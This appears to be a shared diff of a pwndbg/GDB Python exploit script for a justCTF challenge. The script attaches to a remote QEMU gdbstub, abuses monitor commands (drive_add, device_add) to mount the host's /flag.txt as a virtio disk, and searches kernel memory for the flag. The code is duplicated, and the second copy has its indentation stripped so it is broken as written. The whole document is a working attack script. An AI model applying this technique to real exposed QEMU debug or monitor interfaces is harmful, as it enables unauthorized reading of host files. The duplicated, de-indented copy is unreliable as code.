patryk4815 · August 3, 2025 19:10
diff --git a/intended.py b/intended.py
 import pwndbg.dbg
 import pwndbg.aglib.memory
 import pwndbg.aglib.kernel.vmmap
 from pwndbg.commands.rop import split_range_to_chunks
 import time
 import gdb
 import os

 def _delayed_interrupt(timeout_seconds):
    time.sleep(timeout_seconds)
    gdb.execute('interrupt')

 def cont_interrupt_after(timeout_seconds):
    gdb.post_event(lambda: _delayed_interrupt(timeout_seconds))
    gdb.execute('continue')


 def reverse_page(page):
    l = list(split_range_to_chunks(page.start, page.end, chunk_size=0x1000))
    return reversed(l)

 def search_flag():
    for page in pwndbg.aglib.kernel.vmmap.kernel_vmmap_via_monitor_info_mem():
        if page.write and page.vaddr & 0xff_ffff == 0xfe_5000:
            print(page)
            data_prev = b''
            for start, size, progress_cur, progress_max in reverse_page(page):
                if progress_max < 5000:
                    print('skip small page')
                    break

                print(f"Searching flag... {progress_cur} / {progress_max or 1}")
                data = pwndbg.aglib.memory.read(start, size)
                data_prev = data + data_prev
                if b'justCTF{' in data_prev:
                    idx = data_prev.index(b'justCTF{')
                    print(data_prev[idx:].split(b'\n', 1)[0])
                    return True
    return False


 def pwn(host):
    gdb.execute(f'target remote {host}')

    cont_interrupt_after(60)

    print(pwndbg.dbg.selected_inferior().send_monitor('drive_add 0 if=none,file=/flag.txt,format=raw,id=flag'))
    print(pwndbg.dbg.selected_inferior().send_monitor('device_add virtio-blk-pci,drive=flag,id=disk1'))

    cont_interrupt_after(10)

    if search_flag():
        os._exit(3)
    os._exit(2)

 # How to run:
 # pwndbg --command=./exploit.py -ex "py pwn('qsecure-by-rejection.nc.jctf.pro:1234')"
	import pwndbg.dbg
	import pwndbg.aglib.memory
	import pwndbg.aglib.kernel.vmmap
	from pwndbg.commands.rop import split_range_to_chunks
	import time
	import gdb
	import os

	def _delayed_interrupt(timeout_seconds):
	time.sleep(timeout_seconds)
	gdb.execute('interrupt')

	def cont_interrupt_after(timeout_seconds):
	gdb.post_event(lambda: _delayed_interrupt(timeout_seconds))
	gdb.execute('continue')


	def reverse_page(page):
	l = list(split_range_to_chunks(page.start, page.end, chunk_size=0x1000))
	return reversed(l)

	def search_flag():
	for page in pwndbg.aglib.kernel.vmmap.kernel_vmmap_via_monitor_info_mem():
	if page.write and page.vaddr & 0xff_ffff == 0xfe_5000:
	print(page)
	data_prev = b''
	for start, size, progress_cur, progress_max in reverse_page(page):
	if progress_max < 5000:
	print('skip small page')
	break

	print(f"Searching flag... {progress_cur} / {progress_max or 1}")
	data = pwndbg.aglib.memory.read(start, size)
	data_prev = data + data_prev
	if b'justCTF{' in data_prev:
	idx = data_prev.index(b'justCTF{')
	print(data_prev[idx:].split(b'\n', 1)[0])
	return True
	return False


	def pwn(host):
	gdb.execute(f'target remote {host}')

	cont_interrupt_after(60)

	print(pwndbg.dbg.selected_inferior().send_monitor('drive_add 0 if=none,file=/flag.txt,format=raw,id=flag'))
	print(pwndbg.dbg.selected_inferior().send_monitor('device_add virtio-blk-pci,drive=flag,id=disk1'))

	cont_interrupt_after(10)

	if search_flag():
	os._exit(3)
	os._exit(2)

	# How to run:
	# pwndbg --command=./exploit.py -ex "py pwn('qsecure-by-rejection.nc.jctf.pro:1234')"
No results found